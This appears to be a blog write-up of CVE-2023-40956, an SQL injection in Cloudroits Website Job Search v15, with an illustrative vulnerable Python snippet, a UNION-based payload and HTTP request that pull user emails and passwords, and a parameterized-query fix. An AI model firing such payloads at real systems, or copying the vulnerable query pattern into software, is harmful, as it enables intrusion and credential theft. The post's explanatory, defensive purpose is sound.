CVE-2023-40956 - SQL Injection in Cloudroits Website Job Search v15. — Details, Exploit, and Analysis

A serious SQL injection vulnerability, CVE-2023-40956, was recently discovered in Cloudroits Website Job Search v15.. This flaw lets a remote, authenticated attacker run arbitrary SQL code—and, in some scenarios, even execute arbitrary code on the server—by abusing the name parameter in the controllers/main.py component. If you run this version of the software, your data and your users may be at risk.

This post breaks down the vulnerability, how it works, and what you can do to protect your site.

What’s the Vulnerability?

CVE-2023-40956 is a classic SQL injection flaw. The problem is with how the user input, specifically the name parameter, is handled in controllers/main.py. The input is sent directly to the database without enough filtering or parameterization.

Who is affected?

Only authenticated users (i.e., users who can log in)

Impact:

Here’s a simplified (but representative) snippet of the vulnerable code in controllers/main.py

# Vulnerable code (controllers/main.py)
def search_job(self):
    name = request.POST.get('name', '')
    query = "SELECT * FROM jobs WHERE name = '%s'" % name
    result = db.execute(query)
    return render_template("results.html", jobs=result)

Exploitation

Suppose the attacker wants to extract all users’ emails from the users table.

They can craft a name parameter like this

name=' OR 1=1 UNION SELECT id, email, password, null FROM users --

So the HTTP request looks like

POST /search
Content-Type: application/x-www-form-urlencoded

name=' OR 1=1 UNION SELECT id, email, password, null FROM users --

The resulting SQL query

SELECT * FROM jobs WHERE name = '' OR 1=1 UNION SELECT id, email, password, null FROM users --'

The -- at the end comments out the rest of the original SQL query.

Depending on the page rendering code, the response could list user emails and passwords.

From SQL Injection to Remote Code Execution

Some installations of Cloudroits Job Search have advanced features (like user-uploaded plugins or system commands called from SQL). An attacker with more knowledge of the environment could exploit this SQL injection to:

Alter app settings to execute code.

- Escalate privileges (read/write admin data).

Warning: With standard database privileges, remote code execution may not be possible—but it depends on how your database and app server are set up. Always assume the worst!

Update your application immediately if a patch is available.

Check for Cloudroits advisories/updates here.

Here’s an example patch using parameterized queries (with Python’s DB API)

# Safe code (controllers/main.py)
def search_job(self):
    name = request.POST.get('name', '')
    query = "SELECT * FROM jobs WHERE name = %s"
    result = db.execute(query, (name,))
    return render_template("results.html", jobs=result)

This way, the input is never inserted directly into the query string—preventing SQL injection.

Original References

- NVD - CVE-2023-40956
- Cloudroits security advisories
- OWASP SQL Injection Cheat Sheet

Summary

CVE-2023-40956 is a high-severity vulnerability in Cloudroits Website Job Search v15. that allows remote SQL injection through the name parameter. Attackers can steal, change, or destroy your database—and possibly run code on your server.
Fixing the code is straightforward: use parameterized queries. Patching and deploying as soon as possible is essential.

If you’re unsure or need help, reach out to a security professional or contact Cloudroits support ASAP.

Timeline

Published on: 09/15/2023 00:15:07 UTC
Last modified on: 09/19/2023 19:19:23 UTC